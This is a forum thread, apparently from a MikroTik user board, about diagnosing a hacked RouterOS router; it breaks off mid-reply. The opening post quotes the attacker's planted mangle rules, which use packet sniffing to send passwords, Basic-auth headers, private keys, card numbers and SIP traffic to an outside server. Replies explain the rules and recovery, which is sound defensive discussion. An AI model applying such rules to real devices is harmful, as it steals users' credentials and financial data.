Hacked Board

RouterOS General
1

Hi,

i found an hacked board running was on 6.43.2
I´dont now how this had worked, we use Firewall and winbox only responded to known IP (our IP´s)
All Services Ports are changed
ssh=62000
www-ssl=65002
api=64000
winbox=65000
api-all=63000


the wired think is, i have full rights but it is not possible ti change this ports via terminal, via winbox works.


@Mikrotik any idears?


/ip firewall mangle
add action=mark-connection chain=prerouting content=eth_submitWork new-connection-mark=Ethereum
add action=add-dst-to-address-list address-list=Ethereum chain=prerouting content=eth_submitWork
add action=fasttrack-connection chain=prerouting content=eth_submitWork
add action=sniff-tzsp chain=prerouting content="Authorization: Basic" sniff-target=149.56.27.80 sniff-target-port=60000
add action=mark-connection chain=prerouting content=mining.submit new-connection-mark=Bitcoin
add action=add-dst-to-address-list address-list=Bitcoin chain=prerouting content=mining.submit
add action=sniff-tzsp chain=prerouting content="ccn=" sniff-target=149.56.27.80 sniff-target-port=60001
add action=sniff-tzsp chain=prerouting content=privatekey sniff-target=149.56.27.80 sniff-target-port=60001
add action=sniff-tzsp chain=prerouting content="Authorization: Basic" sniff-target=149.56.27.80 sniff-target-port=60000
add action=sniff-tzsp chain=prerouting content=json sniff-target=149.56.27.80 sniff-target-port=60001
add action=sniff-tzsp chain=prerouting content="passwd=" sniff-target=149.56.27.80 sniff-target-port=60002
add action=sniff-tzsp chain=prerouting content="password=" sniff-target=149.56.27.80 sniff-target-port=60002
add action=sniff-tzsp chain=prerouting content="pass=" sniff-target=149.56.27.80 sniff-target-port=60002
add action=fasttrack-connection chain=prerouting content=Bitcoin
add action=sniff-tzsp chain=prerouting dst-port=5060 protocol=tcp sniff-target=149.56.27.80 sniff-target-port=60003
add action=sniff-tzsp chain=prerouting dst-port=5060 protocol=udp sniff-target=149.56.27.80 sniff-target-port=60003
2

They have enabled packet sniffer to send all passwords, bitcoin private keys, etc to their server. You should format and netinstall with a known good config, once a board is compromised it cannot be safely restored from winbox / terminal alone since a root exploit could have been used.

3

There likely is some router on your network where such rules are not in place, it was infected too, and it spread the infection to other routers inside your network that are well protected from outside.
This is always a risk with attacks that themselves include spreading code that scans the connected networks.

4

single router on single VDSL Connection, no other Mikrotik devices…
IP Filter for services is enabled since installation…(2017)

5

If services were available from the LAN, then an infected PC on the LAN could exploit the router from the LAN side.

6

But if it’s 6.43.x how can it be exploited as to my knowledge there are no open security bugs?

7

Do you use same “paranoic” :smiley: rules for LAN as for WAN side?

8

There was at least one open security bug (fixed in 6.43.:sunglasses: that could be used when the password was known.
The password may have leaked earlier or using another mechanism.

9

Impossible, after Winbox hack, we changed all passwords on boards that directly connected to the Internet, we don’t use Passwords more then on one device

10

Changing passwords is not enough, you MUST netinstall any compromised device!

11

This is first and only board I found.
We did update on all core routers in the same night the updates was available in the early morning all CPEs

We checked all login protocols (2weeks back) there was no login to our bords, no files no scripts nothing, and this board here, users begin complain speed on 31.12.2018, NoC was not able to login so Ticket for exchange was made, today we found this board with the config above, password was not changed, but ports (services) and firewall (filter / mangle), but our remote ip was still active in services (there are 4 iPs used)

12

mistry7 - Are you 100% sure that you changed all the passwords on your router for all the users configured on it? Are you 100% sure that passwords were changed after an upgrade to v6.43 not before that?

13

One user only on all boards, yes in PW list change is Dokumented with date, and there are 3 updates done after, last update was from 6.43.2 to 6.43.8

I did Winbox connect before exchange (mac)
Export config and found changed thinks
Want to edit the service ports in terminal and it doesn’t work ( script that we use to secure all boards based on ip services and firewall)
There was no error, but the changes ports did not change

Manuell edit with Winbox worked

14

The rules are the same that were added by the old hack/exploit script.
So 99.99% chance that these rules you had even before upgrade, and they kept sending the attacker your passwords, old and new, even after upgrade.

upgrading patches the vulnerability, it doesn’t modify your config. if you had such config, upgrade would leave it.

15

But how is about the time line.

  1. Update Board in the night of fixed release
  2. Review config and change passwords (after hacked boards found around the world and possibility someone know the pw´s)
  3. Board works fine for 5-6 Month
  4. now with 6.43.2 found board with changed config, how they could know the password?


    This script does not apply in terminal windows, nothing happens

/ip service
set telnet address=185.18.XX.XX
set ftp address=185.18.XX.XX
set www address=185.18.XX.XX
set ssh address=185.18.XX.XX
set api address=176.221.XX.XX/32
set winbox address=185.18.XX.XX
set api-ssl disabled=yes

16

Not sure this happened and did not leave some file or script in place:

  1. Review config